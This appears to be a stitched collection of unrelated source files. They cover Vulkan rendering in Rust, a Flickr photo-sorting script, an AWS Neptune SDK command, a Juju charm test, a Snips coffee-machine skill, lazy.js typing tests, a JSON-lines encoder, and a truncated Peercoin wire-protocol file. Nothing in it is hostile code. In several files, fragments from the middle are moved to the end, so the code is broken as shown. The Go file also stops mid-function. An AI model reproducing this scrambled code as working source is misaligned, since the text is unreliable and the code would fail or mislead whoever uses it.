.render_area(vk::Rect2D { offset: vk::Offset2D { x: 0, y: 0 }, extent: surface_extent, }) .clear_values(&clear_values); device.cmd_begin_render_pass( command_buffer, &render_pass_begin_info, vk::SubpassContents::INLINE, ); let mut proj_matrix = utils::get_ortho_projection_matrix( 0.0, surface_extent.width as f32, 0.0, surface_extent.height as f32, 0.0, 1.0, ); proj_matrix[0] *= (scale as f32) * 0.1; proj_matrix[5] *= (scale as f32) * 0.1; let proj_matrix_raw = utils::f32_to_u8(&proj_matrix); device.cmd_push_constants( command_buffer, pipeline_layout, vk::ShaderStageFlags::VERTEX, 0, proj_matrix_raw, ); let viewport = vk::Viewport { x: 0.0f32, y: 0.0f32, width: surface_extent.width as f32, height: surface_extent.height as f32, min_depth: 0.0f32, max_depth: 1.0f32, }; device.cmd_set_viewport(command_buffer, 0, &[viewport]); let scissor = vk::Rect2D { offset: vk::Offset2D { x: 0, y: 0 }, extent: vk::Extent2D { width: surface_extent.width, height: surface_extent.height, }, }; device.cmd_set_scissor(command_buffer, 0, &[scissor]); 
device.cmd_bind_descriptor_sets( command_buffer, vk::PipelineBindPoint::GRAPHICS, pipeline_layout, 0, &[pos_uv_desc_set], &[], ); device.cmd_bind_pipeline(command_buffer, vk::PipelineBindPoint::GRAPHICS, pipeline); device.cmd_draw(command_buffer, 78, 1, 0, 0); device.cmd_end_render_pass(command_buffer); match device.end_command_buffer(command_buffer) { Err(_) => { return Err(format!( "failed to end command buffer fot active resource index {}", active_resource_index )) } _ => (), } let wait_semaphores = [image_available_semaphore]; let masks = [vk::PipelineStageFlags::COLOR_ATTACHMENT_OUTPUT]; let buffers = [command_buffer]; let signal_semaphores = [rendering_complete_semaphore]; let submit_info = vk::SubmitInfo::builder() .wait_semaphores(&wait_semaphores) .wait_dst_stage_mask(&masks) .command_buffers(&buffers) .signal_semaphores(&signal_semaphores) .build(); let infos = [submit_info]; match device.queue_submit(queue, &infos, graphics_fence) { Err(_) => return Err(String::from("failed to submit graphics command buffer")), _ => (), } let wait_semaphores = [rendering_complete_semaphore]; let swapchains = [swapchain]; let indices = [image_index]; let present_info = vk::PresentInfoKHR::builder() .wait_semaphores(&wait_semaphores) .swapchains(&swapchains) .image_indices(&indices); if let Err(err) = swapchain_loader.queue_present(queue, &present_info) { if err == vk::Result::SUBOPTIMAL_KHR || err == vk::Result::ERROR_OUT_OF_DATE_KHR { panic!("swapchain resized"); } else { return Err(String::from("failed to present")); } } } Ok(()) }
draw
cameras_to_albums.py
#!/usr/bin/env python """ A simple script to organize photos into albums named by their camera source. For me, this is useful for cycling through only high quality photos on my TV hooked up to a chromecast. """ import argparse import flickrapi def auth_flickr(api_key, api_secret): """Authenticate user to flickr API.""" flickr = flickrapi.FlickrAPI(api_key, api_secret, format='parsed-json') flickr.authenticate_via_browser(perms='write') return flickr def get_user_id(flickr, user): """Get the user_id from the username.""" user_data = flickr.people.findByUsername(username=user) return user_data['user']['id'] def get_photoset_dict(flickr, user_id): """construct a photoset dict of album name to album/set id.""" print('Gathering dictionary of all photos in all photosets...') init_photoset = flickr.photosets.getList(user_id=user_id) photoset_dict = dict() set_num = 1 for set_page in range(1, init_photoset['photosets']['pages'] + 1): photoset = flickr.photosets.getList(user_id=user_id, page=set_page) for pset in photoset['photosets']['photoset']: print('processing photoset %s of %s' % (set_num, init_photoset['photosets']['total'])) set_num += 1 # a_dict = {'thing': {'this': ['list, 'values']} } photoset_dict[pset['title']['_content']] = {pset['id']: []} init_photoset_object = flickr.photosets.getPhotos( photoset_id=pset['id']) for photoset_page in range(1, init_photoset_object['photoset']['pages'] + 1): photoset_object = flickr.photosets.getPhotos( user_id=user_id, photoset_id=pset['id'], page=photoset_page) photoset_dict[pset['title']['_content']][ pset['id']] += [p['id'] for p in photoset_object['photoset']['photo']] return photoset_dict def main(args): """Main code block. Do all the things.""" flickr = auth_flickr(args.api_key, args.api_secret) user_id = get_user_id(flickr, user=args.username) album_dict = get_photoset_dict(flickr, user_id) init_photos = flickr.people.getPhotos(user_id=user_id) total = init_photos['photos']['total'] photo_num = args.initial_photo / 100 * 100 # TODO ensure less than total photos if photo_num > total: raise('Trying to start at photo %s but only %s total. Exiting.' % (args.initial_photo, total)) init_page = args.initial_photo / 100 + 1 # 100 photos per page for page_num in range(init_page, init_photos['photos']['pages'] + 1): photo_batch = flickr.people.getPhotos(user_id=user_id, page=page_num) for photo in photo_batch['photos']['photo']: photo_num += 1 photo_id = photo['id'] print('processing photo %s of %s: %s' % (photo_num, total, photo_id)) photo_data = flickr.photos.getExif(photo_id=photo_id) camera_name = photo_data['photo']['camera'] if len(camera_name) > 0:
description='All photos taken behind a %s' % camera_name) album_dict[camera_name] = { new_set['photoset']['id']: [photo_id]} continue elif photo_id not in [p for p in album_dict[camera_name].values()[0]]: # if this photo is not in the appropriate album, add it print('Adding photo to camera album.') flickr.photosets.addPhoto(photoset_id=album_dict[ camera_name].keys()[0], photo_id=photo_id) album_dict[camera_name].values()[0].append(photo_id) else: print('Photo is already in the appropriate set') continue else: print('Skipping photo with insufficient metadata.') if __name__ in '__main__': parser = argparse.ArgumentParser() parser.add_argument('-d', '--dry_run', action='store_true', default=False, help="Verbose minus action. Default=False") parser.add_argument('-i', '--initial_photo', help='approximate initial photo. Rounds down to nearest hundred', type=int, default=0) parser.add_argument('-k', '--api_key', help='flickr API key', required=True) parser.add_argument('-s', '--api_secret', help='flickr API secret', required=True) parser.add_argument('-u', '--username', help='your flickr username', required=True) exit(main(parser.parse_args()))
if camera_name not in album_dict.keys(): print('adding camera album "%s"' % camera_name) new_set = flickr.photosets.create(title=camera_name, primary_photo_id=photo_id,
ResetDBParameterGroupCommand.ts
import { getSerdePlugin } from "@aws-sdk/middleware-serde"; import { HttpRequest as __HttpRequest, HttpResponse as __HttpResponse } from "@aws-sdk/protocol-http"; import { Command as $Command } from "@aws-sdk/smithy-client"; import { FinalizeHandlerArguments, Handler, HandlerExecutionContext, HttpHandlerOptions as __HttpHandlerOptions, MetadataBearer as __MetadataBearer, MiddlewareStack, SerdeContext as __SerdeContext, } from "@aws-sdk/types"; import { DBParameterGroupNameMessage, ResetDBParameterGroupMessage } from "../models/models_0"; import { NeptuneClientResolvedConfig, ServiceInputTypes, ServiceOutputTypes } from "../NeptuneClient"; import { deserializeAws_queryResetDBParameterGroupCommand, serializeAws_queryResetDBParameterGroupCommand, } from "../protocols/Aws_query"; export interface ResetDBParameterGroupCommandInput extends ResetDBParameterGroupMessage {} export interface ResetDBParameterGroupCommandOutput extends DBParameterGroupNameMessage, __MetadataBearer {} /** * <p>Modifies the parameters of a DB parameter group to the engine/system default value. To * reset specific parameters, provide a list of the following: <code>ParameterName</code> and * <code>ApplyMethod</code>. To reset the entire DB parameter group, specify the * <code>DBParameterGroup</code> name and <code>ResetAllParameters</code> parameters. When * resetting the entire group, dynamic parameters are updated immediately and static parameters * are set to <code>pending-reboot</code> to take effect on the next DB instance restart or * <code>RebootDBInstance</code> request.</p> * @example * Use a bare-bones client and the command you need to make an API call. * ```javascript * import { NeptuneClient, ResetDBParameterGroupCommand } from "@aws-sdk/client-neptune"; // ES Modules import * // const { NeptuneClient, ResetDBParameterGroupCommand } = require("@aws-sdk/client-neptune"); // CommonJS import * const client = new NeptuneClient(config); * const command = new ResetDBParameterGroupCommand(input); * const response = await client.send(command); * ``` * * @see {@link ResetDBParameterGroupCommandInput} for command's `input` shape. * @see {@link ResetDBParameterGroupCommandOutput} for command's `response` shape. * @see {@link NeptuneClientResolvedConfig | config} for NeptuneClient's `config` shape. 
* */ export class ResetDBParameterGroupCommand extends $Command< ResetDBParameterGroupCommandInput, ResetDBParameterGroupCommandOutput, NeptuneClientResolvedConfig > { // Start section: command_properties // End section: command_properties constructor(readonly input: ResetDBParameterGroupCommandInput) { // Start section: command_constructor super(); // End section: command_constructor } /** * @internal */ resolveMiddleware( clientStack: MiddlewareStack<ServiceInputTypes, ServiceOutputTypes>, configuration: NeptuneClientResolvedConfig, options?: __HttpHandlerOptions ): Handler<ResetDBParameterGroupCommandInput, ResetDBParameterGroupCommandOutput> { this.middlewareStack.use(getSerdePlugin(configuration, this.serialize, this.deserialize)); const stack = clientStack.concat(this.middlewareStack); const { logger } = configuration; const clientName = "NeptuneClient"; const commandName = "ResetDBParameterGroupCommand"; const handlerExecutionContext: HandlerExecutionContext = { logger, clientName, commandName, inputFilterSensitiveLog: ResetDBParameterGroupMessage.filterSensitiveLog, outputFilterSensitiveLog: DBParameterGroupNameMessage.filterSensitiveLog, }; const { requestHandler } = configuration; return stack.resolve( (request: FinalizeHandlerArguments<any>) =>
handlerExecutionContext ); } private serialize(input: ResetDBParameterGroupCommandInput, context: __SerdeContext): Promise<__HttpRequest> { return serializeAws_queryResetDBParameterGroupCommand(input, context); } private deserialize(output: __HttpResponse, context: __SerdeContext): Promise<ResetDBParameterGroupCommandOutput> { return deserializeAws_queryResetDBParameterGroupCommand(output, context); } // Start section: command_body_extra // End section: command_body_extra }
requestHandler.handle(request.request as __HttpRequest, options || {}),
test_charm.py
# Copyright 2021 Unicorn # See LICENSE file for licensing details. # # Learn more about testing at: https://juju.is/docs/sdk/testing import unittest from unittest import mock import charm from ops.model import Unit from ops.testing import Harness class TestCharm(unittest.TestCase): def assert_active_unit(self, unit: Unit): self.assertEqual(unit.status.name, "active") self.assertEqual(unit.status.message, "Unit is ready") class TestInitCharm(TestCharm): def test_init(self): """Test initialization of charm.""" harness = Harness(charm.PrometheusBindExporterOperatorCharm) harness.begin() self.assert_active_unit(harness.charm.unit) class TestCharmHooks(TestCharm): def patch(self, obj, method): """Mock the method.""" _patch = mock.patch.object(obj, method) mock_method = _patch.start() self.addCleanup(_patch.stop) return mock_method def setUp(self): self.harness = Harness(charm.PrometheusBindExporterOperatorCharm) self.addCleanup(self.harness.cleanup) self.harness.begin() # mock subprocess self.mock_subprocess = self.patch(charm, "subprocess") # mock getting private address mock_get_binding = self.patch(self.harness.model, "get_binding") mock_get_binding.return_value = self.mock_binding = mock.MagicMock() self.mock_binding.network.bind_address = "127.0.0.1" # mock fetch resource self.mock_fetch = self.patch(self.harness.model.resources, "fetch") self.mock_fetch.return_value = "prometheus-bind-exporter.snap" def _add_bind_exporter_relation(self): """Help function to add bind-exporter relation.""" relation_id = self.harness.add_relation("bind-exporter", "prometheus2") self.harness.add_relation_unit(relation_id, "prometheus2/0") return relation_id def test_manage_prometheus_bind_exporter_service(self):
def test_private_address(self): """Test help function to get private address.""" address = self.harness.charm.private_address self.assertEqual("127.0.0.1", address) def test_on_install(self): """Test install hook.""" exp_call = mock.call(["snap", "install", "--dangerous", "prometheus-bind-exporter.snap"]) self.harness.charm.on.install.emit() self.mock_fetch.assert_called_once_with("prometheus-bind-exporter") self.assertIn(exp_call, self.mock_subprocess.check_call.mock_calls) self.assert_active_unit(self.harness.charm.unit) def test_on_config_changed(self): """Test config-changed hook.""" # this will trigger self.harness.charm.on.config_changed.emit() self.harness.update_config({"exporter-listen-port": "9120", "exporter-stats-groups": "server"}) self.assertEqual(self.harness.charm._stored.listen_port, "9120") self.assertEqual(self.harness.charm._stored.stats_groups, "server") self.mock_subprocess.check_call.assert_called_once_with( ["snap", "set", "prometheus-bind-exporter", "web.listen-address=127.0.0.1:9120", "web.stats-groups=server"]) self.assert_active_unit(self.harness.charm.unit) def test_on_config_changed_with_bind_exporter_relation(self): """Test config-changed hook with existing bind-exporter relation.""" relation_id = self._add_bind_exporter_relation() self.harness.update_config({"exporter-listen-port": "9120"}) relation_data = self.harness.get_relation_data(relation_id, self.harness.charm.unit.name) self.assertDictEqual(relation_data, {"hostname": "127.0.0.1", "port": "9120"}) self.assert_active_unit(self.harness.charm.unit) def test_on_bind_exporter_relation_changed(self): """Test Prometheus relation changed hook.""" relation_id = self._add_bind_exporter_relation() # update relation -> trigger bind_exporter_relation_changed hook self.harness.update_relation_data(relation_id, "prometheus2/0", {}) relation_data = self.harness.get_relation_data(relation_id, self.harness.charm.unit.name) self.assertDictEqual(relation_data, {"hostname": "127.0.0.1", "port": "9119"}) self.assert_active_unit(self.harness.charm.unit) def test_on_prometheus_relation_departed(self): """Test Prometheus relation changed hook.""" relation_id = self._add_bind_exporter_relation() # remove relation -> trigger bind_exporter_departed hook self.harness.remove_relation(relation_id) self.assertEqual(0, len(self.harness.model.relations.get("bind-exporter"))) self.assert_active_unit(self.harness.charm.unit)
"""Test manage the prometheus-bind-exporter snap.""" self.harness.charm._manage_prometheus_bind_exporter_service() self.mock_subprocess.check_call.assert_called_once_with( ["snap", "set", "prometheus-bind-exporter", "web.listen-address=127.0.0.1:9119", "web.stats-groups=server,view,tasks"])
action-coffee.py
#!/usr/bin/env python2 # -*-: coding utf-8 -*- import ConfigParser from coffeehack.coffeehack import CoffeeHack from hermes_python.hermes import Hermes import io import Queue CONFIGURATION_ENCODING_FORMAT = "utf-8" CONFIG_INI = "config.ini" MQTT_IP_ADDR = "localhost" MQTT_PORT = 1883 MQTT_ADDR = "{}:{}".format(MQTT_IP_ADDR, str(MQTT_PORT)) class SnipsConfigParser(ConfigParser.SafeConfigParser): def to_dict(self): return {section: {option_name : option for option_name, option in self.items(section)} for section in self.sections()} def read_configuration_file(configuration_file): try: with io.open(configuration_file, encoding=CONFIGURATION_ENCODING_FORMAT) as f: conf_parser = SnipsConfigParser() conf_parser.readfp(f) return conf_parser.to_dict() except (IOError, ConfigParser.Error) as e: return dict() class Skill: def __init__(self): config = read_configuration_file("config.ini") extra = config["global"].get("extra", False) self.cafe = CoffeeHack(extra = extra) def extract_value(val): res = [] if val is not None: for r in val: res.append(r.slot_value.value.value) return res def extract_intensite_cafe(intent_message): return extract_value(intent_message.slots.intensite_cafe) def extract_nombre_cafe(intent_message):
def extract_type_cafe(intent_message): return extract_value(intent_message.slots.type_cafe) def extract_taille_cafe(intent_message): return extract_value(intent_message.slots.taille_cafe) def callback(hermes, intent_message): t = extract_type_cafe(intent_message) s = extract_taille_cafe(intent_message) ta = extract_intensite_cafe(intent_message) n = extract_nombre_cafe(intent_message) type_cafe = t[0] if len(t) else "" taille_cafe = s[0] if len(s) else "" intensite_cafe = ta[0] if len(ta) else "" number = 1 if len(n): try: number = int(n[0]) except ValueError, e: number = 2 print(t) print(s) print(ta) hermes.skill.cafe.verser(type_cafe = type_cafe, taille_cafe = taille_cafe, intensite_cafe = intensite_cafe, number = number) def cafe_io(hermes, intent_message): hermes.skill.cafe.cafe_io() def cafe_nettoie(hermes, intent_message): hermes.skill.cafe.nettoie() def cafe_vapeur(hermes, intent_message): hermes.skill.cafe.vapeur() if __name__ == "__main__": skill = Skill() with Hermes(MQTT_ADDR) as h: h.skill = skill h.subscribe_intent("segar:verser", callback) \ .subscribe_intent("segar:cafe_io", cafe_io) \ .subscribe_intent("nettoie", cafe_nettoie) \ .subscribe_intent("vapeur", cafe_vapeur) \ .loop_forever()
return extract_value(intent_message.slots.nombre_cafe)
lazy.js-tests.ts
/// <reference path="lazy.js.d.ts" /> // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - interface Foo { foo(): string; } interface Bar { bar(): string; } // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - var foo: Foo; var bar: Bar; var fooArr: Foo[]; var barArr: Bar[]; // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - var fooSequence: LazyJS.Sequence<Foo>; var barSequence: LazyJS.Sequence<Bar>; var fooArraySeq: LazyJS.ArrayLikeSequence<Foo>; var barArraySeq: LazyJS.ArrayLikeSequence<Bar>; var fooObjectSeq: LazyJS.ObjectLikeSequence<Foo>; var anyObjectSeq: LazyJS.ObjectLikeSequence<any>; var fooAsyncSeq: LazyJS.AsyncSequence<Foo>; var strSequence: LazyJS.Sequence<string>; var stringSeq: LazyJS.StringLikeSequence; var obj: Object; var bool: boolean; var num: number; var str: string; var x: any = null; var arr: any[]; var exp: RegExp; var strArr: string[]; var numArr: string[]; function fnCallback(): void { } function fnErrorCallback(error: any): void { } function fnValueCallback(value: Foo): void { } function fnGetKeyCallback(value: Foo): string { return str; } function fnTestCallback(value: Foo): boolean { return bool; } function fnMapCallback(value: Foo): Bar { return bar; } function fnMapStringCallback(value: string): string { return str; } function fnNumberCallback(value: Foo): number { return num; } function fnMemoCallback(memo: Bar, value: Foo): Bar { return bar; } function fnGeneratorCallback(index: number): Foo { return foo; } // Lazy fooArraySeq = Lazy(fooArr); fooObjectSeq = Lazy<Foo>({a: foo, b: foo}); anyObjectSeq = Lazy<any>({a: num, b: str}); stringSeq = Lazy(str); // Strict var Strict = Lazy.strict(); fooArraySeq = Strict([foo, foo]).pop(); // Sequence fooAsyncSeq = fooSequence.async(num); fooSequence = fooSequence.chunk(num); fooSequence = fooSequence.compact(); fooSequence = fooSequence.concat(arr); fooSequence = fooSequence.consecutive(num); bool = fooSequence.contains(foo); fooSequence = fooSequence.countBy(str); fooObjectSeq = fooSequence.countBy(fnGetKeyCallback); fooSequence = fooSequence.dropWhile(fnTestCallback); fooSequence = fooSequence.each(fnValueCallback); bool = fooSequence.every(fnTestCallback); fooSequence = fooSequence.filter(fnTestCallback); fooSequence = fooSequence.find(fnTestCallback); fooSequence = fooSequence.findWhere(obj); x = fooSequence.first(); fooSequence = fooSequence.first(num); fooSequence = fooSequence.flatten(); fooObjectSeq = fooSequence.groupBy(fnGetKeyCallback);
fooSequence = fooSequence.initial(num); fooSequence = fooSequence.intersection(arr); fooSequence = fooSequence.invoke(str); bool = fooSequence.isEmpty(); str = fooSequence.join(); str = fooSequence.join(str); foo = fooSequence.last(); fooSequence = fooSequence.last(num); fooSequence = fooSequence.lastIndexOf(foo); barSequence = fooSequence.map(fnMapCallback); foo = fooSequence.max(); foo = fooSequence.max(fnNumberCallback); foo = fooSequence.min(); foo = fooSequence.min(fnNumberCallback); fooSequence = fooSequence.pluck(str); bar = fooSequence.reduce(fnMemoCallback); bar = fooSequence.reduce(fnMemoCallback, bar); bar = fooSequence.reduceRight(fnMemoCallback, bar); fooSequence = fooSequence.reject(fnTestCallback); fooSequence = fooSequence.rest(num); fooSequence = fooSequence.reverse(); fooSequence = fooSequence.shuffle(); bool = fooSequence.some(); bool = fooSequence.some(fnTestCallback); fooSequence = fooSequence.sortBy(fnNumberCallback); fooSequence = fooSequence.sortedIndex(foo); fooSequence = fooSequence.sum(); fooSequence = fooSequence.sum(fnNumberCallback); fooSequence = fooSequence.takeWhile(fnTestCallback); fooSequence = fooSequence.union(fooArr); fooSequence = fooSequence.uniq(); fooSequence = fooSequence.where(obj); fooSequence = fooSequence.without(fooArr); fooSequence = fooSequence.zip(arr); fooArr = fooSequence.toArray(); obj = fooSequence.toObject(); // ArrayLikeSequence fooArraySeq = fooArraySeq.concat(); fooArraySeq = fooArraySeq.first(); fooArraySeq = fooArraySeq.first(num); foo = fooArraySeq.get(num); num = fooArraySeq.length(); barArraySeq = fooArraySeq.map(fnMapCallback); fooArraySeq = fooArraySeq.pop(); fooArraySeq = fooArraySeq.rest(); fooArraySeq = fooArraySeq.rest(num); fooArraySeq = fooArraySeq.reverse(); fooArraySeq = fooArraySeq.shift(); fooArraySeq = fooArraySeq.slice(num); fooArraySeq = fooArraySeq.slice(num, num); // ObjectLikeSequence fooObjectSeq = fooObjectSeq.defaults(obj); fooSequence = fooObjectSeq.functions(); fooObjectSeq = fooObjectSeq.get(str); fooObjectSeq = fooObjectSeq.invert(); strSequence = fooObjectSeq.keys(); fooObjectSeq = fooObjectSeq.omit(strArr); fooSequence = fooObjectSeq.pairs(); fooObjectSeq = fooObjectSeq.pick(strArr); arr = fooObjectSeq.toArray(); obj = fooObjectSeq.toObject(); fooSequence = fooObjectSeq.values(); // StringLikeSequence str = stringSeq.charAt(num); num = stringSeq.charCodeAt(num); bool = stringSeq.contains(str); bool = stringSeq.endsWith(str); str = stringSeq.first(); stringSeq = stringSeq.first(num); num = stringSeq.indexOf(str); num = stringSeq.indexOf(str, num); str = stringSeq.last(); stringSeq = stringSeq.last(num); num = stringSeq.lastIndexOf(str); num = stringSeq.lastIndexOf(str, num); stringSeq = stringSeq.mapString(fnMapStringCallback); stringSeq = stringSeq.match(exp); stringSeq = stringSeq.reverse(); stringSeq = stringSeq.split(str); stringSeq = stringSeq.split(exp); bool = stringSeq.startsWith(str); stringSeq = stringSeq.substring(num); stringSeq = stringSeq.substring(num, num); stringSeq = stringSeq.toLowerCase(); stringSeq = stringSeq.toUpperCase();
fooSequence = fooSequence.indexOf(x); fooSequence = fooSequence.initial();
mod.rs
use bytes::{BufMut, Bytes, BytesMut}; use futures::{sink::Sink, SinkExt}; use serde::Serialize; use serde_json; use std::io; use tokio::io::{ AsyncBufReadExt, AsyncRead, AsyncWrite, AsyncWriteExt, BufReader, BufWriter, Lines, }; use tokio_util::codec::{Encoder, FramedWrite}; pub mod diff; pub mod http_interaction; pub mod spec_chunks; pub mod spec_events; pub struct JsonLineEncoder { delimeter: Bytes, first: bool, } impl Default for JsonLineEncoder { fn default() -> Self
} impl JsonLineEncoder { fn new(delimeter: &[u8]) -> Self { Self { delimeter: Bytes::copy_from_slice(delimeter), first: true, } } } impl<T> Encoder<T> for JsonLineEncoder where T: Serialize, { type Error = JsonLineEncoderError; fn encode(&mut self, item: T, buf: &mut BytesMut) -> Result<(), Self::Error> { let json = serde_json::to_string(&item)?; buf.reserve(json.len() + self.delimeter.len()); if self.first { self.first = false; } else { buf.put(&self.delimeter[..]); } buf.put(json.as_bytes()); Ok(()) } } #[derive(Debug, thiserror::Error)] pub enum JsonLineEncoderError { #[error("json serialisation error: {}", .0)] Json(serde_json::Error), #[error("io error: {}", .0)] Io(io::Error), } impl From<io::Error> for JsonLineEncoderError { fn from(err: io::Error) -> JsonLineEncoderError { JsonLineEncoderError::Io(err) } } impl From<serde_json::Error> for JsonLineEncoderError { fn from(err: serde_json::Error) -> JsonLineEncoderError { JsonLineEncoderError::Json(err) } } pub async fn write_to_json_lines<'a, S, I>( sink: S, items: impl IntoIterator<Item = &'a I>, ) -> Result<(), &'static str> where S: AsyncWrite, S: Unpin, I: Serialize, I: 'a, // E: Unpin { let mut framed_write = into_json_lines::<S, I>(sink); for item in items { if let Err(_) = framed_write.send(item).await { panic!("could not send json line to sink"); // TODO: Find way to actually write error info } } Ok(()) } // TODO: return a proper error, so downstream can distinguish between IO, serde, etc // TODO: make this work with impl Stream instead pub async fn write_to_json_array<'a, S, I>( sink: S, items: impl IntoIterator<Item = &'a I>, ) -> Result<(), JsonLineEncoderError> where S: AsyncWrite, S: Unpin, I: Serialize, I: 'a, // E: Unpin { let mut framed_write = into_json_array_items(sink); framed_write.get_mut().write_u8(b'[').await?; for item in items { if let Err(_) = framed_write.send(item).await { panic!("could not send json array item to sink"); // TODO: Find way to actually write error info } } framed_write.get_mut().write_u8(b']').await?; framed_write.get_mut().flush().await?; Ok(()) } pub fn into_json_lines<S, I>(sink: S) -> FramedWrite<BufWriter<S>, JsonLineEncoder> where S: AsyncWrite, I: Serialize, { let writer = BufWriter::new(sink); let codec = JsonLineEncoder::new(b"\n"); FramedWrite::new(writer, codec) } pub fn into_json_array_items<S>(sink: S) -> FramedWrite<BufWriter<S>, JsonLineEncoder> where S: AsyncWrite, { let writer = BufWriter::new(sink); let codec = JsonLineEncoder::new(b"\n,"); FramedWrite::new(writer, codec) }
{ Self { delimeter: Bytes::from_static(b"\n"), first: true, } }
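Not part of the file above: a small Go illustration of the byte stream that into_json_array_items / write_to_json_array are set up to produce — a leading '[', items separated by the "\n," delimiter, and a closing ']'. The item values and names here are placeholders; exact whitespace of the real output depends on serde_json.

package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"log"
)

func main() {
	// Illustrative items; any serializable values would do.
	items := []map[string]int{{"a": 1}, {"b": 2}, {"c": 3}}

	var buf bytes.Buffer
	buf.WriteByte('[') // mirrors framed_write.get_mut().write_u8(b'[')
	for i, it := range items {
		if i > 0 {
			buf.WriteString("\n,") // same delimiter as into_json_array_items
		}
		b, err := json.Marshal(it)
		if err != nil {
			log.Fatal(err)
		}
		buf.Write(b)
	}
	buf.WriteByte(']')

	// Output (one valid JSON array, items separated by "\n,"):
	// [{"a":1}
	// ,{"b":2}
	// ,{"c":3}]
	fmt.Println(buf.String())
}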
msgversion.go
// Copyright (c) 2013-2016 The btcsuite developers // Use of this source code is governed by an ISC // license that can be found in the LICENSE file. package wire import ( "bytes" "fmt" "io" "strings" "time" ) // MaxUserAgentLen is the maximum allowed length for the user agent field in a // version message (MsgVersion). const MaxUserAgentLen = 256 // DefaultUserAgent for wire in the stack const DefaultUserAgent = "/ppcwire:0.5.0/" // MsgVersion implements the Message interface and represents a bitcoin version // message. It is used for a peer to advertise itself as soon as an outbound // connection is made. The remote peer then uses this information along with // its own to negotiate. The remote peer must then respond with a version // message of its own containing the negotiated values followed by a verack // message (MsgVerAck). This exchange must take place before any further // communication is allowed to proceed. type MsgVersion struct { // Version of the protocol the node is using. ProtocolVersion int32 // Bitfield which identifies the enabled services. Services ServiceFlag // Time the message was generated. This is encoded as an int64 on the wire. Timestamp time.Time // Address of the remote peer. AddrYou NetAddress // Address of the local peer. AddrMe NetAddress // Unique value associated with message that is used to detect self // connections. Nonce uint64 // The user agent that generated messsage. This is a encoded as a varString // on the wire. This has a max length of MaxUserAgentLen. UserAgent string // Last block seen by the generator of the version message. LastBlock int32 // Don't announce transactions to peer. DisableRelayTx bool } // HasService returns whether the specified service is supported by the peer // that generated the message. func (msg *MsgVersion) HasService(service ServiceFlag) bool { return msg.Services&service == service } // AddService adds service as a supported service by the peer generating the // message. func (msg *MsgVersion) AddService(service ServiceFlag) { msg.Services |= service } // BtcDecode decodes r using the bitcoin protocol encoding into the receiver. // The version message is special in that the protocol version hasn't been // negotiated yet. As a result, the pver field is ignored and any fields which // are added in new versions are optional. This also mean that r must be a // *bytes.Buffer so the number of remaining bytes can be ascertained. // // This is part of the Message interface implementation. func (msg *MsgVersion) BtcDecode(r io.Reader, pver uint32, enc MessageEncoding) error { buf, ok := r.(*bytes.Buffer) if !ok { return fmt.Errorf("MsgVersion.BtcDecode reader is not a " + "*bytes.Buffer") } err := readElements(buf, &msg.ProtocolVersion, &msg.Services, (*int64Time)(&msg.Timestamp)) if err != nil { return err } err = readNetAddress(buf, pver, &msg.AddrYou, false) if err != nil { return err } // Protocol versions >= 106 added a from address, nonce, and user agent // field and they are only considered present if there are bytes // remaining in the message. if buf.Len() > 0 { err = readNetAddress(buf, pver, &msg.AddrMe, false) if err != nil { return err } } if buf.Len() > 0 { err = readElement(buf, &msg.Nonce) if err != nil { return err } } if buf.Len() > 0 { userAgent, err := ReadVarString(buf, pver) if err != nil { return err } err = validateUserAgent(userAgent) if err != nil { return err } msg.UserAgent = userAgent } // Protocol versions >= 209 added a last known block field. 
It is only // considered present if there are bytes remaining in the message. if buf.Len() > 0 { err = readElement(buf, &msg.LastBlock) if err != nil { return err } } /* Peercoin - bloom filters not supported // There was no relay transactions field before BIP0037Version, but // the default behavior prior to the addition of the field was to always // relay transactions. if buf.Len() > 0 { // It's safe to ignore the error here since the buffer has at // least one byte and that byte will result in a boolean value // regardless of its value. Also, the wire encoding for the // field is true when transactions should be relayed, so reverse // it for the DisableRelayTx field. var relayTx bool readElement(r, &relayTx) msg.DisableRelayTx = !relayTx } */ return nil } // BtcEncode encodes the receiver to w using the bitcoin protocol encoding. // This is part of the Message interface implementation. func (msg *MsgVersion) BtcEncode(w io.Writer, pver uint32, enc MessageEncoding) error { err := validateUserAgent(msg.UserAgent) if err != nil { return err } err = writeElements(w, msg.ProtocolVersion, msg.Services, msg.Timestamp.Unix()) if err != nil { return err } err = writeNetAddress(w, pver, &msg.AddrYou, false) if err != nil { return err } err = writeNetAddress(w, pver, &msg.AddrMe, false) if err != nil { return err } err = writeElement(w, msg.Nonce) if err != nil { return err } err = WriteVarString(w, pver, msg.UserAgent) if err != nil { return err } err = writeElement(w, msg.LastBlock) if err != nil { return err } /* Peercoin - bloom filters not supported // There was no relay transactions field before BIP0037Version. Also, // the wire encoding for the field is true when transactions should be // relayed, so reverse it from the DisableRelayTx field. if pver >= BIP0037Version { err = writeElement(w, !msg.DisableRelayTx) if err != nil { return err } } */ return nil } // Command returns the protocol command string for the message. This is part // of the Message interface implementation. func (msg *MsgVersion) Command() string { return CmdVersion } // MaxPayloadLength returns the maximum length the payload can be for the // receiver. This is part of the Message interface implementation. func (msg *MsgVersion) MaxPayloadLength(pver uint32) uint32 { // XXX: <= 106 different // Protocol version 4 bytes + services 8 bytes + timestamp 8 bytes + // remote and local net addresses + nonce 8 bytes + length of user // agent (varInt) + max allowed useragent length + last block 4 bytes + // relay transactions flag 1 byte. return 33 + (maxNetAddressPayload(pver) * 2) + MaxVarIntPayload + MaxUserAgentLen } // NewMsgVersion returns a new bitcoin version message that conforms to the // Message interface using the passed parameters and defaults for the remaining // fields. func NewMsgVersion(me *NetAddress, you *NetAddress, nonce uint64, lastBlock int32) *MsgVersion { // Limit the timestamp to one second precision since the protocol // doesn't support better. 
